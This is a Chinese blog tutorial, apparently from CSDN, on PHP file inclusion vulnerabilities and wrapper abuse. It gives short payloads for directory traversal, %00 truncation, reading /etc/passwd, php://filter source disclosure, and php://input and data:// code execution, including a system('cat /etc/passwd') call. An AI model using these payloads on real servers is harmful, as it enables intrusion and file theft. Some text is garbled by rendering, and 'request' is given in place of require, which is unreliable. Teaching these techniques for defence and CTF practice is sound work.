文件包含漏洞与伪协议利用

最新推荐文章于 2024-05-15 18:21:54 发布
最新推荐文章于 2024-05-15 18:21:54 发布
阅读量1.2k 收藏 3
点赞数 3
分类专栏: web安全 文章标签: php linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45617819/article/details/104705417
版权

0x00 基础

包含函数:
函数概况
include( f i l e p a t h filepath filepath & < u r l url url&伪协议>)在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
include_once( f i l e p a t h filepath filepath & < u r l url url&伪协议>)只包含一次,其它同上
request( f i l e p a t h filepath filepath & < u r l url url&伪协议>)在包含的过程中如果出现错误,会直接报错并退出程序的执行
request_once( f i l e p a t h filepath filepath & < u r l url url&伪协议>)只包含一次,其它同上
file( f i l e p a t h filepath filepath & < u r l url url&伪协议>)把整个文件读入一个数组
fopen( f i l e p a t h filepath filepath & < u r l url url&伪协议>,$ m o d e mode mode)打开文件或者URL(包含伪协议),搭配fread()和fgets()使用
readfile( f i l e p a t h filepath filepath & < u r l url url&伪协议>)读取并输出文件(不输出php代码),返回字节数
highlight_file( f i l e p a t h filepath filepath & < u r l url url&伪协议>)高亮输出代码
show_source( f i l e p a t h filepath filepath & < u r l url url&伪协议>)同上
file_get_contents(( f i l e p a t h filepath filepath & < u r l url url&伪协议>)把整个文件读入一个字符串
php配置文件:php.ini

allow_url_fopen=<bool>:允许获取远程url文件信息

<?php 
file_get_contents("http://127.0.0.1/test.php/") //如:file()、file_get_contents()
?>                             注:url后要加"/",只能获取php信息,不能获取https协议信息。

allow_url_include=<bool>:允许包含运行远程url文件和部分伪协议(‘php://input’和’data://’)

<?php
 include('php://input') //如include()、request()
 ?>

0x01 文件包含

include($path)及其类似函数会包含其他文件,默认所有文件都当作php执行,不能运行则输出字符串。

  • 本地文件包含
<?php
include(test.php)  //运行test.php
?>
  • 远程文件包含(allow_url_fopen=1&allow_url_include=1)
    注:url后要加"/",只能包含php文件,不能包含https协议。
<?php
include('http://127.0.0/test.php')  //运行test.php
?>
  • 读取重要文件
/etc/passwd    //用户信息文件
/etc/my.conf   //mysql配置文件
/etc/php/ini   //php配置文件
<?php
include('/etc/password');
?>
  • 包含限制
  1. 目录遍历
<?php
$a=$_GET['a'];
include('/var/www/html'.$a);     //越权读取文件 ?a=../../../passwd
?>
  1. 00截断

00截断究其原因是因为chr(0)这个字符,也就是ascii码第一位字符,这个字符会忽略后面的字符,从而达到截断的目的,它的url编码是 %00,十六进制是0x00,00截断漏洞存在于php5.2.0及更低版本中。

<?php
$a=$_GET['a'];
include($a.'/var/www/html/1.txt') //截断后面字符  ?a=/etc/passwd%00
?>
  • 伪协议包含:如下

0x02 伪协议

  • php://input(allow_url_fopen=0&allow_url_include=1)

获取post数据 ,可以使用file()和file_get_contents()读取数据

<?php
$a=file('php://input');
$b=file_get_contents('php://input');
print_r($a);
echo $b
?>

也可以使用include()等包含函数运行传入的数据代码

<?php
include('php://input')  #post数据传入<?php phpinfo();?>
?>
  • php://filter(allow_url_fopen=0&allow_url_include=0),base64编码读取源代码
<?php
include('php://filter/read=convert.base64-encode/resource=test.php');
?>
  • file://(allow_url_fopen=0&allow_url_include=0),访问本地文件系统,必须用绝对路径
<?php
include('file:///etc/passwd') //读取本地文件
?>
  • data://(allow_url_fopen=1&allow_url_include=1)传输数据
<?php
include('data://text/plain,<?php phpinfo()?>');                //传输php代码数据并运行
include('data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=');  //解码base64传输数据
include('data://text/plain,<?php system('cat /etc/passwd')?>');//利用命令执行读取本地文件
?>
happysecurity
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php伪协议 文件包含,文件包含漏洞伪协议利用
weixin_33166692的博客
03-30 1017
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
文件包含漏洞php伪协议
qq_46485934的博客
09-26 778
一.前情提要 本人在写buuctf的时候,碰到一道文件包含php伪协议的题目include 于是,我就想深入的了解一下PHP伪协议 二.文件包含函数 首先归纳下常见的文件包含函数:include,require,include_once,require_once,highlight_file,show_source,readfile,file_get_contents,fopen,file 三.伪协议 php伪协议php封装协议,这些协议常被CTF出题中与文件包含漏洞结合。这里做个小结,涉及的相关伪协议
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1655
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
文件包含中的伪协议
最新发布
My笔记的博客
05-15 772
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6463
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
pikachu皮卡丘靶机伪协议文件包含
weixin_41689182的博客
02-25 183
pikachu靶机伪协议
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞PHP包含读文件; PHP包含写文件; PHP包含日志文件; PHP截断包含;...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
xss漏洞,网站安全编程,黑客编程
02-07
1. 了解攻击手段:学习常见的攻击方法,如SQL注入、命令注入、文件包含等,以便及时发现并修复漏洞。 2. 安全架构设计:在系统设计阶段就考虑安全性,如使用安全的通信协议(HTTPS),分离敏感数据和非敏感数据。 ...
应用的OpenSSL:文件加密中的CTR模式
04-11
OpenSSL是一个强大的安全套接层(SSL)和传输层安全(TLS)协议实现库,同时也包含了众多的加密算法、证书处理等功能。在本文中,我们将深入探讨如何使用OpenSSL库在文件加密中应用CTR(Counter,计数器)模式。 CTR...
WEB入门——文件包含漏洞PHP伪协议
HasntStartIsOver的博客
06-04 893
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞
文件包含漏洞PHP伪协议
buffedon的博客
06-03 1117
文件包含漏洞PHP伪协议文件包含漏洞1. 原理攻击利用的原理攻击成功的条件2. 分类本地文件包含LFI的利用远程文件包含3. 文件上传漏洞防范禁止0字节在PHP中配置open_basedir尽量避免动态包含的变量allow_url_include置为off4. PHP伪协议file://http://ftp://php://php://stdin, php://stdout 和 php://stderrphp://inputphp://outputphp://fdphp://memory 和 php://
【汇总】PHP 伪协议 利用
weixin_30527551的博客
07-28 113
日期:2019-07-28 21:24:36 更新: 作者:Bay0net 介绍: 0x01、基本信息 文件包含函数 include() require() include_once() require_once() highlight_file () show_source () readfile() file_get_contents () fopen() file...
文件包含伪协议漏洞知识总结
u014794539的博客
07-22 865
文件包含漏洞也是一种“注入型漏洞” 其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行 php常见的文件包含函数 require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。 include(),找不到被包含的文件时只会产生警告,脚本将继续运行。 include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。 require_once()与require()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。 ...
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1075
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
pikachu 文件包含
weixin_54431413的博客
04-03 1874
文件包含漏洞是include函数在接收参数值的时候没有进行过滤,导致各种形式的文件写入php语句均可执行。文件包含漏洞要配合文件上传才能发挥出更大的威力。 一、防范方法 1.用白名单方法,写死要包含的文件名。固定住 2.waf产品 二、本地文件包含 只能包含网址服务器上的所有的文件 1.在服务器上建立一个1.jkl文件 2.跨级去访问这个文件 3.向上四级 由于在源码中路径是 include/ 三、远程文件包含 前提:在phpstudy中开启allow_url_incl
攻防世界——文件包含伪协议
yanfangjie的博客
01-17 713
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析这段代码的意思 strstr(page,"php://"):匹配PHP://在page,"php://"):匹配PHP:/
伪协议文件包含
bamanju0574的博客
09-23 396
文件包含漏洞可以用到各种伪协议 0x01文件包含函数 php当中会造成文件包含漏洞的函数有:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file php、data伪协议读文件和代码执行的方式: 1.?file...
文件包含-伪协议filter
08-22
通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞利用。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值